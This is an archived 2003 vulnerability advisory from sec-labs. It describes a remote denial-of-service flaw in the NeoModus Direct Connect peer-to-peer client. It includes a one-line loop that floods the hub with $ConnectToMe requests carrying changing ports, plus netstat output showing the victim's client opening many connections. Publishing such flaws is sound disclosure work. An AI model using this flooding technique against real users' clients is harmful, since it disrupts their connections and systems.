TUCoPS :: Windows Apps :: bt618.txt

NeoModusDirect Connect 1.0 build 9 Remote DoS FSC:
 


--=.J:gysAG)N(3_zv
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit


     sec-labs team proudly presents:
     
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably newest version.	  
     by Lord YuP
     13/07/2003



   I. BACKGROUND

     Direct Connect is a windows (i've found also a linux version but
     i don't have time to test it) p2p file-sharing program, well 
     common nowadays.


   II. DESCRIPTION


     Appending to aDe DC Client to Client HandShake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 
	---------------------------------------------------------- 

	ACTIVE FILE DOWNLOAD 
	---------------------- 
	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)


     As u can guess, the Direct Connect client after receiving
     "$Connect ToMe..." command from hub, tries to connect to 
     specyfic IP and PORT sent by the Downloader.

     The attacker (evil-downloader) can send infinite requests
     to HUB with specyfic marked ip:port causing DoS attack 
     in the Victim's client. 

     Little example:
     
     Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }

     Client: (runned "netstat -a")
     

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


   III. IMPACT

     The attacked client may be DoS-ed in case of that internet connection
     can be reseted/stopped, some clients may flood with the "Out of Memory"
     msgboxes in case of that, system may be not working correctly, and DC
     client may be terminated.



-- 
sec-labs team [http://sec-labs.hack.pl]


--=.J:gysAG)N(3_zv
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE/ErGbZ4yD+a7QMvgRAtHAAJ4p3VdNdcgaalFZrNd55aUTQV/oWACfcIWP
8SbHBbP2lBeggKIxUnpKoSw=
=Jk4G
-----END PGP SIGNATURE-----

--=.J:gysAG)N(3_zv--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH